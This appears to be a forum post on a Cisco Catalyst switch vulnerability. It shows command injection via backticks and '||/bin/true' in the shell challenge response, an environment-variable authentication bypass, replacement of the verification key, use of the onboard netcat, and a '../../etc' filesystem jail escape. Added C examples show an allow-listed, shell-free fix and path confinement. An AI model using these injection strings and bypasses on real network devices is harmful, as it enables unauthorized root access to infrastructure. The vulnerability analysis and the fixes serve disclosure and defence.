Verifying Authenticity for Digitally Signed Images
Older 3560 & 3580 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]
Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]
No input validation ==> just use backticks (`...`):
[code]
Please enter the shell access response based on the above challenge (Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]
Key verification failed
Switch#
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.

Booting...
Initializing RAM +++++++@@@@@@@@...++++++++
[/code]
Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]
What can be done with it? Whatever reality you want, you might create...
[code]
[EXTRA] Building a toolchain for:
[EXTRA]   build  = x86_64-unknown-linux-gnu
[EXTRA]   host   = x86_64-unknown-linux-gnu
[EXTRA]   target = mips-unknown-elf

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability 0x41000000 = 0xf676e75, stripped
[/code]
When you request a shell, the following happens:
a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response')
(the same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads 2k from /dev/mtdblock6 via libcodesign_pd.so + libflash.so, signs the challenge, compares it to the response and returns 0 only if it is valid
c) so anything like ||/bin/true will work just fine
shell_wrapper ignores the verification if DISABLE_SHELL_AUTHENTICATION=1 is set in the environment.
The RSA public key in mtdblock6 can be changed, so you can generate a valid response if you hold its private companion.
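The root cause described in a) to c) is a classic one: an operator-typed string is pasted into a command line that system() hands to /bin/sh, so the shell interprets backticks and `||` before the verifier ever sees the argument. The example below is added here and is not Cisco's code or the real shell_wrapper; it shows the vulnerable string-building pattern next to a hardened invocation that allow-lists the response, runs the verifier with execve() and an argv array (no shell in the path), passes an empty environment so a stray DISABLE_SHELL_AUTHENTICATION=1 cannot reach it, and fails closed. The hex-only response format, the 512-byte bound and the `verifier_path` parameter (set to /bin/true or /bin/false so the demo runs anywhere) are assumptions for illustration, not the real verifier's interface.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern, as the page describes shell_wrapper: the typed response
 * is spliced into a command line that system() would hand to /bin/sh, so
 * backticks, '||' and friends are interpreted by the shell. Only the string
 * is built here; nothing is executed. Returns 0 on success, -1 if truncated. */
int build_shell_command_vulnerable(const char *challenge, const char *response,
                                   char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "code_sign_verify_nova_pkg SecureShell %s %s",
                     challenge, response);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Allow-list check on the response before it goes anywhere near a process.
 * Assumption: a legitimate response is a hex string of bounded length; adapt
 * to the real response format, but keep it an allow-list, not a blacklist. */
int response_is_wellformed(const char *response)
{
    size_t len = strlen(response);
    if (len == 0 || len > 512)
        return 0;
    for (size_t i = 0; i < len; i++) {
        char c = response[i];
        int is_hex = (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
                     (c >= 'A' && c <= 'F');
        if (!is_hex)
            return 0;
    }
    return 1;
}

/* Hardened invocation: validate first, then execve() the verifier directly
 * with an argv array (no shell parses the arguments) and an empty environment
 * (DISABLE_SHELL_AUTHENTICATION=1 in the caller's environment cannot leak
 * through). Fails closed: any fork/exec/wait error counts as "not verified".
 * verifier_path is a parameter (assumption) so the demo can use /bin/true. */
int verify_response_noshell(const char *verifier_path, const char *challenge,
                            const char *response)
{
    if (!response_is_wellformed(response))
        return 0;
    pid_t pid = fork();
    if (pid < 0)
        return 0;
    if (pid == 0) {
        char *const argv[] = { (char *)verifier_path, "SecureShell",
                               (char *)challenge, (char *)response, NULL };
        char *const envp[] = { NULL };
        execve(verifier_path, argv, envp);
        _exit(127); /* exec failed: report failure to the parent */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

int main(void)
{
    char cmd[256];
    /* challenge prefix as shown on the page; the injected response is the page's own */
    const char *challenge = "94d5c01766c7a0a29c8c59fec3ab992";
    const char *injected = "`reboot`";

    build_shell_command_vulnerable(challenge, injected, cmd, sizeof cmd);
    printf("system() would receive: %s\n", cmd);

    printf("allow-list accepts `reboot`? %d\n", response_is_wellformed(injected));
    printf("allow-list accepts deadbeef? %d\n", response_is_wellformed("deadbeef"));

    /* stand-ins for the real verifier: /bin/true exits 0, /bin/false does not */
    printf("verifier ok   -> %d\n", verify_response_noshell("/bin/true", challenge, "deadbeef"));
    printf("verifier fail -> %d\n", verify_response_noshell("/bin/false", challenge, "deadbeef"));
    printf("injected resp -> %d\n", verify_response_noshell("/bin/true", challenge, injected));
    return 0;
}
```

Note that the allow-list and the shell-free exec fix the injection in a), but not b) or the environment bypass: if the public key in mtdblock6 is writable and the environment variable is honoured, the verifier itself is still not a trustworthy root of trust, and that needs a write-protected key store and a wrapper that never consults the environment.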
You can escape the IOS filesystem jail (/mnt/sd3/user) with ../../, so
[code]
copy foo ../../etc
[/code]
would copy foo to /etc.
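The jail escape above works because the copy command joins the user path onto the jail root without checking that the result still lies inside it. The function below is an added example (not Cisco's code) of the check a confined file command should make before touching the filesystem: it resolves `.` and `..` lexically against the jail root and refuses any path that would climb above it. It does no filesystem access, so symlinks are not considered; on a real system it should be paired with realpath() on the result after this lexical check. The jail root /mnt/sd3/user comes from the page; the 64-component limit is an assumption.

```c
#include <stdio.h>
#include <string.h>

#define MAX_COMPONENTS 64

/* Lexically resolve `rel` against `base` and report whether the result stays
 * inside base. Returns 1 and writes the resolved path to `out` if confined,
 * 0 if the path escapes the jail, has too many components, or does not fit.
 * A leading '/' in `rel` is treated as relative to the jail root. */
int resolve_within_jail(const char *base, const char *rel,
                        char *out, size_t outlen)
{
    const char *parts[MAX_COMPONENTS];
    size_t lens[MAX_COMPONENTS];
    int depth = 0;
    const char *p = rel;

    /* split on '/', dropping '.' and popping one level for '..' */
    while (*p) {
        while (*p == '/')
            p++;
        if (!*p)
            break;
        const char *start = p;
        while (*p && *p != '/')
            p++;
        size_t len = (size_t)(p - start);
        if (len == 1 && start[0] == '.')
            continue;
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return 0; /* would climb above the jail root */
            depth--;
            continue;
        }
        if (depth >= MAX_COMPONENTS)
            return 0;
        parts[depth] = start;
        lens[depth] = len;
        depth++;
    }

    /* rebuild: base (without trailing slashes) + surviving components */
    size_t blen = strlen(base);
    if (blen + 1 >= outlen)
        return 0;
    memcpy(out, base, blen);
    size_t pos = blen;
    while (pos > 1 && out[pos - 1] == '/')
        pos--;
    for (int i = 0; i < depth; i++) {
        if (pos + 1 + lens[i] + 1 > outlen)
            return 0;
        out[pos++] = '/';
        memcpy(out + pos, parts[i], lens[i]);
        pos += lens[i];
    }
    out[pos] = '\0';
    return 1;
}

int main(void)
{
    char resolved[256];
    const char *jail = "/mnt/sd3/user";
    const char *inputs[] = { "foo", "a/../b", "../../etc", "a/../../b" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (resolve_within_jail(jail, inputs[i], resolved, sizeof resolved))
            printf("%-12s -> allowed: %s\n", inputs[i], resolved);
        else
            printf("%-12s -> rejected (escapes %s)\n", inputs[i], jail);
    }
    return 0;
}
```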
Regards,
Networ King